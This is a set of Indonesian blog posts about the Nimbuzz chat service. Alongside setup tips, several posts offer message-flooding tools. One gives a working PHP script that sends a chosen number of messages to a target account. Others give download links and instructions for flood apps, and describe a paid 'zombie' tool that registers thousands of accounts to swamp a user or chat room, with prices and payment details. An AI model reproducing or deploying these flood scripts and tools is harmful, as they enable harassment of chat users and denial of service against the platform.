Ini nimbuzz modifikasi yg mungkin ditunggu-tunggu para nimbuzzer. Karena dengan nimbuzz ini kita bisa chatting sepuasnya tanpa bayar alias gratis..
bagi pengguna indosat cukup isi "front query" dengan wap3g.indosat.com

monggo di sedot...sederek

Info slengkapnya dr :
http://www.aplikasi-hape.co.cc/search/label/nimbuzz%20handler
Diposting oleh BADBOY
Diposting oleh BADBOY
cara :
1. Register ID jabber,gunain server jabbus.org, xmpp.ru , jabber.org , jabber.ru .....dst
2. Menu -> Masuk Tools/peralatan > Service Discovery/pencarian layanan > menu lg -> pilih Server isi dgn :
j2j.jabbus.org
j3j.jabbus.org
gtalk.jrudevels.org
xmpp.jrudevels.org
j2j.jsmart.web.id
Atau server lain.a yg bs transport ke Nimbuzz. Pilih salah satu aja server diatas -> register -> isi username n pasword jid Nimbuzz km, contoh : jid : jester (tdk memakai @nimbuzz.com)
Password : ********
-> Server km isi : nimbuzz.com -> host ip isi dgn : openfire.nimbuzz.com -> yg lain biarkan saja -> Send/kirim

Tunggu sampai server yg km masukan td online klu server td muncul di transport dan online brarti km tlah brhasil.


Met Mencoba bro n sis..!!!

Nb. Sblum melakukan cara2 tsb,ada baikny settingan add authorize list kalian di setting auto langganan aja.... Dan stlah brhasil biasa.a daftar CL Nimbuzz qt tdk muncul dan agr bisa muncul kalian hrs add ulang lg tmn2 km.
dan untuk bisa masuk Room Nimbuzz gunakan Format penulisan kyk gini contoh :

nama_room%conference.nimbuzz.com

Host : Server km contoh : xmpp.jrudevels.org

Utk Bombus Nimbuzz Via Jabber Script XML Console atau Runner Bombus Avalon km bisa liat di SINI
Diposting oleh BADBOY
OwnSkin Preview
download: x_generation

OwnSkin Preview
download: Nimbuzz Badboy
Diposting oleh BADBOY
Diposting oleh BADBOY
gabung di rum
nimbuzzer_jakarta

anggota dari room nimbuzzer_jakarta

1.arwah_helpb0t
2.badb0y
3.b32n
4.sky_66
5.basogila
6.yuan
7.dokter
8.b!j!
9.yuan_madara_akatsuki

sory buat yg bloom ketulis soal nya w keburu ngantuk
nb:add fb  w::::di::::arwah_helpbot@rocketmail.com
Diposting oleh BADBOY
SELAMAT DATANG
di
AREA XXX HOT

Perhatian:
bagi sobat yg dbawah 17th dilarang lebih jauh memasuki area ini.
begitu jg sobat yg belum siap mental dharap keluar dari area ini.
isi dan akibatnya tidak ditanggung oleh admin.
thank's tas perhatiannya.

silahkan lanjuti pnjelajahnnya bagi yg memenuhi syarat diatas.





Diposting oleh BADBOY
Diposting oleh BADBOY
buat yang mau beli/pesan plood web
bisa pv w di nic:arwah_helpb0t@nimbuzz.com

spesial,thx:b32n@nimbuzz.com
Diposting oleh BADBOY
Diposting oleh BADBOY
cara bikin flood web u tinggal cari cara nya sendiri ya ,:-D kikikikiki

$host='openfire.nimbuzz.com';
$port='5222';
$user=$_POST['username'];
$resource='xmpphp';
$server='nimbuzz.com';
$password=$_POST['password'];
$to=$_POST['target'];
$jumlah=$_POST['jumlah'];
$body=$_POST['textplud'];
// activate full error reporting
//error_reporting(E_ALL & E_STRICT);
require_once 'XMPPHP/Log.php';
include 'XMPPHP/XMPP.php';

#Use XMPPHP_Log::LEVEL_VERBOSE to get more logging for error reports
#If this doesn't work, are you running 64-bit PHP with <>
$conn = new XMPPHP_XMPP($host, $port, $user, $password, $resource, $server, $printlog=false, $loglevel=XMPPHP_Log::LEVEL_INFO);

try {
$conn->connect();
$conn->processUntil('session_start');
$conn->presence();
for ($i = 1; $i <=$jumlah; $i++)
{
$conn->message($to, $body);
}
$conn->disconnect();

} catch(XMPPHP_Exception $e) {
die($e->getMessage());
}

echo "$_POST[textplud], $_POST[target]";

?>


scripnya di save as "send.php"

trus buat lounch nya pake scrip ini


http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
http://www.w3.org/1999/xhtml">








username
(masukkan username anda)


password (masukkan password anda)


target (masukkan id user nimbuzz target, misal target@nimbuzz.com)


jumlah (jumlah pesan yg dikirim)


textplud


(submit) 
Diposting oleh BADBOY
Diposting oleh BADBOY


     v            sedot di bawah ini ok
killer flood 3g

bila tidak bisa diinstall, maka lakukan perbaharuan serifikat pada website microsoft, karena applikasi ini gw compile pake C# dotnet

petunjuk pemakaian
minimum spesifikasi komputer:
pentium 4
ram 256
windows xp service pack 2

dalam keadan awal lihat pada title bar status offline
masukkan username, password, resource (standard lah)
boleh klik sign in dulu (bebas)
ketika sign in, maka lihat pada title bar, akan muncul state try connecting, sampai status online maka tombol sign in berubah menjadi sign off.setelah itu maka dapat melakukan aktifitas flood
sebelum plud pilih dulu chat configuration nyamau ngeplud private atau diroom
nah.... wajib centang salah satu atau semua option dari flood type nya
kemudian pada time configuration
masukkan speed plud dan period (jumlah plud) yang akan dikirim
bagian flood area masukkan message text nya, disitu ada 5 baris, boleh diisi 1 baris atau semua
kalo kurang puas, bisa bikin sendiri sesuai kreasi kamu, asalkan format filenya adalah txt
kemudian load dari tombol file
kalo udah semua
maka tinggal klik tombol action, lihat progress bar jalan berarti plud bekerja
kalo koneksi putus, tombol berubah menjadi sign in dan pada title bar status menjadi offline
lakukan sign in sebelum melakukan aktifitas flood
benernya gw juga mau publish dotnet frame work fix nya, tapi berhubung gede banget gw harap teman2 nimbuzzer bisa download dulu dari internet, kapasitasnya 26 mb

Dosa tanggung sendiri ya , dan jangan salahkan gw untuk hal yang sungguh sangat menggangu, gunakan untuk kompetisi antar teman saja, jadilah seorang flooder sejati bersama killer flood

ingat killer flood ingat the coding man

peace ah

romeo_must_die@nimbuzz.com
iwak_betok@nimbuzz.com
1me@nimbuzz.com
Diposting oleh BADBOY
Diposting oleh BADBOY
Diposting oleh BADBOY
nee w ada 1 trik untuk kalian semua yang suka war fluud di nimbuzz lagsung aja ok ,ubah di pengaturan akun u yg d bombus u .pilih akun ,trus klik edit masuk ke pengaturan tambahan trusssss pilih hanya konfrensi ,,,,,,, w jamin u war pv pasti gakbakalan dc n postingan lawan u gak bakalan masuk ke uuuu pulsa pun awet,,,,,ok
nb :jgn lupa add nic w :arwah_helpb0t@nimbuzz.com
Diposting oleh BADBOY
baby ngiler plud signed
download
baby ngiler plud unsigned
download
baby ngiler plud v 2.1 signed
download
NFB_flood
download
NFB_flood v1.2
download
babynew.zip
download
killer flood source code.zip
download
Diposting oleh BADBOY
Diposting oleh BADBOY
Diposting oleh BADBOY
Diposting oleh BADBOY
arwah..helpb0t@nimbuzz.com 
arwah_fluuder@nimbuzz.com
1 .eliash/9
2 .jaran 13
3 .axl_rose.
4 .~hantu~laut~
5 .kate_bin_laden
6 .starki/dika
7 .otak_scrib
8 .ben
9 .Adi-ciutz
10.semua anak rum jakarta dehhhhhhh
11.antoffx
12.★•●―��┴♣д$$αR»♣•―•••♣•♣

sori buat sob2x yang belum disebutin ada waktu w tambah lagi:-p
Diposting oleh BADBOY
http://www.soft32.com/Download/free-trial/Journal_Macro/4-14753-1.html
Diposting oleh BADBOY
Nimbuzz Family Indonesia
Diposting oleh BADBOY

Mungkin tool ini sdh ketinggalan jaman di banding dgn semakin marak na flood web akhir2 ini
tp apps ini punya kelebihan pada duel Pv...yg sering duel Pv,,sedot aja apps ini


DOWNLOAD


Apps ini memerlukan password untu membuka nya. . .
Password na bisa di minta sama Bang Eliash sang penciptanya...
tp klo km susah minta password na sama dia...km bisa Pv q di arwah_helpb0t@nimbuzz.com
Diposting oleh BADBOY
Satu lagi aplikasi chating buat hp java atau simbyan yaitu NIMBUZZ aplikasi ini support atau bisa untuk login akun kita yg ada di YM,GTALK,JABBER,FB,SKYPE dll anda bisa mendownlodnya disini
Diposting oleh BADBOY
 
Diposting oleh BADBOY
ALL ABOUT BABY_NGILER_EMPLUD
Disini saya mencoba menyediakan dan membhs sedikit tentang BabyNgilerEmplud, di mana setelah sobat dnlod, n buka terlebih dahulu buka dan isi akun nya kamu tinggal isi username dan pasword nimbuzz km aja, yg laen udah terisi smua, alias g usah di otak-atik lagi salah malah g benar.wkwkwk jd sok taw low..truz km save dh.
Kmdn bru km sing ing, stlh brhsil konex km akan ktmu dg plood private n plood group/rom, silahkn pilih, disini dianjur kn stlh 2 kali send/ melakukn plood tlg disconex lg, kl tdk g akan mw bkrj dg maksimal lg..!
Moga berhasil n w saran kn lbh baek piss...!
Ini aplikasi berbahaya alias bikin orang susah/marah. Wkwkwkwk..!
Di bawah ini w sediakn 3 versi pilihan silahkan dnlod yg cocok dg hpmu...!
Bila g cocok jngn kecewa ya..senxum dunk..!

BABY_NGILER_EMPLUD3.jar
BABY_NGILER_EMPLUD2.jar
BABY_NGILER_EMPLUD.jar
Diposting oleh BADBOY

  • Trick Plood entered

  • Trick Plood template

  • Trick Plood text cepat

  • Trick Plood emotions

  • Trick Plood bergerak

  • Trick Plood symbian

  • Trick Kloning nick

  • Trick Invite user to room

  • Trick Private misterius

  • Trick Anti banned

  • Trick Anti nick alias

  • Trick 1 room 2 nick

  • Trick Message offline

  • Trick Pv nick kejepit

  • Trick Modif nimbuzz

  • hallo sobat smuanya...
    pernah gak sobat c8 dengan seseorang yang posting textnya berwarni n keren abis shingga membuat kita merasa iri...he..he..he.
    jangan kecil hati dulu, karena itu da triek/kode nya...
    ikuti aja info dibawah ini..

    anda pun bisa melakukan hal itu, copy ja kode texts dibawah ini da jadi kan lah tempelate sobat di nimbuzz serta ikuti info kelanjutnnya

    tapi jangan kaget ya jika hal ini gak maen di hp nokia krn hanya hp SE yg suport hal ini..
    begitu jg da beberapa tipe hp SE yg g suport...
    ok pland selamat mencoba, dan tunggu triek trbaru berikutnya...
    segera...

    triek nimbuzz laenya sobat bisa dapat kan infonya di sini
    Dapatkan jg berbagai aplikasi chating nya,...!
    Multy nimbuzz n more app chat
    CODE XML_bombus

    mau dapatkn aplikasi nimbuzz sepecial, karena dg makin bny km pny aplikasi nick km bisa ol multi jg kn, silahkan pilih dan download apps nya

    disini

    Diposting oleh BADBOY
    sekilas membaca namanya ingat film2 zombie, dimana orang yang masih hidup juga akan menjadi zombie ketika batok kepalanya digigit zombie dan otaknya dimakan.

    Hal ini mungkin jadi inspirasi para hacker tempoe doeloe untuk mengaplikasikannya kedalam security attack semacam denial of serice dan diberi nama zombie.

    zombie adalah salah satu jenih DoS kelas berat, yang sanggup menyerang server2 terbilang mahal dan memiliki pendanaan yang kuat. Sebut saja yahoo, amazon, hotbot, dll pernah diserang dan dikerjain oleh orang iseng menggunakan tools zombie ini.

    Zombie ini pula yang menginspirasi saya untuk membuat lanjutan versi killer flood menjadi zombie. Bukan tanpa alasan kalo sampe tools ini diciptakan, karena ketatnya prosedur flood yang saat ini diberlakukan oleh mr. nimbuzz.

    tampilan awal dari zombie killer flood 4g adalah seperti ini :
    main form of zombie killer flood 4g

    hal yang dilakukan pertama kali adalah mendaftarkan multi nick yang kemudian akan kita sebut sebagai tentara zombie melalui form register dibawah ini :
    tampilan awal dari zombie killer flood 4g adalah seperti ini :
    register form

    pada form register diatas, kita dapat mendaftarkan multi nick index dengan satu awalan nama yang kita sebut sebagai group username. Pendaftarannya pun tidak begitu lama, rata2 untuk mendaftarkan 2000 nick cukup memakan waktu 1-2 menit saja, tergantung coverage sinyal mu saat itu.

    setelah selesai maka dapat langsung melakukan aktifitas flood, bisa pv, bisa juga room. Adapun 2 form flood itu sebagai berikut :
    1. flood Private
    flood Private
    2. Flood Room
    Flood room


    lalu bagaimana kedahsayatan zombie killer flood 4g????
    1. Sampai saat ini hanya zombie killer flood4g yang dapat melakukan flood room secara terus menerus/dapat menembus room kemudian melakukan plud message
    2. Dibandingkan plud pv yang lain, zombie ini memang mengerikan, 1 target diserang banyak zombie, terasa seperti diserang/dikeroyok banyak nick sekali jalan. Jadi kalo sudah begini kamu tidak perlu contact teman2 mu hanya untuk menyerang 1 target.
    Hanya saja zombie ini jangan dibuat untuk menggangu semua penghuni nimbuzz yaa. Lakukan untuk perang dengan orang yang seimbang saja.

    Untuk menggunakan zombie cukup dengan spesifikasi minimal dibawah ini :
    Pentium 3 - 100mhz ram minimum 512 (tergantung banyak nick yang dipakai)
    windows 98 atau lebih tinggi
    koneksi jaringan internet
    sudah paham sama nimbuzz(penting nih)


    oh ya ketinggalan, pada kesempatan ini juga gw mau promo dengan para nimbuzzer.

    Gw ada penawaran menarik untuk menggunakan zombie killer flood 4 g ini :
    ==========================================
    berhubung zombie adalah flood yang lebih berbahaya dari flood sebelumnya maka, bila ada teman2 yang ingin menggunakannya dapat pesan kepada saya langsung, saya sudah sediakan ada 6 paket flood zombie yang rasanya terjangkau kantong nimbuzzer semua. Zombie killer flood 4G ini khusus buat PC (personal computer).

    paket-paket itu antara lain :
    ==============================
    1. Paket 20 zombie (Paket hemat) Rp. 150.000,- /net
    1. Paket 100 zombie harga Rp. 300.000,- /net
    2. Paket 500 zombie harga Rp. 500.000,- /net
    3. Paket 1000 zombie harga Rp. 750.000,- /net
    4. Paket 1500 zombie harga Rp. 1.000.000,- /net
    5. Paket 2000 zombie harga Rp. 1.500.000,- /net
    6. Paket Unlimited harga Rp. 2.000.000,- /net

    bagi teman-teman ada yang berminat, bisa calling saya di nomor : 081324900642, atau pv gw lewat nimbuzz JID = romeo_must_die@nimbuzz.com
    Pembelian tidak bisa diganti pulsa(batal bila terlanjur transfer pulsa maka pulsa akan langsung dikembalikan melalui transfer #858 kepada bersangkutan ke nomor simpati juga). Pembayaran hanya dapat dilakukan dan diterima melalui transfer BCA ke nomor rekening 1340773124 atas nama Rahmad Hidayat.

    No sample for this time

    agar sukses men-download file gunakan free download manager
    download free download manager

    saya tunggu kehadiran zombie-zombie yang baru, wkwkwkwkwkwkwkwkkwwkkk



    peace ah
    salam metal from me
    romeo must die
    Diposting oleh BADBOY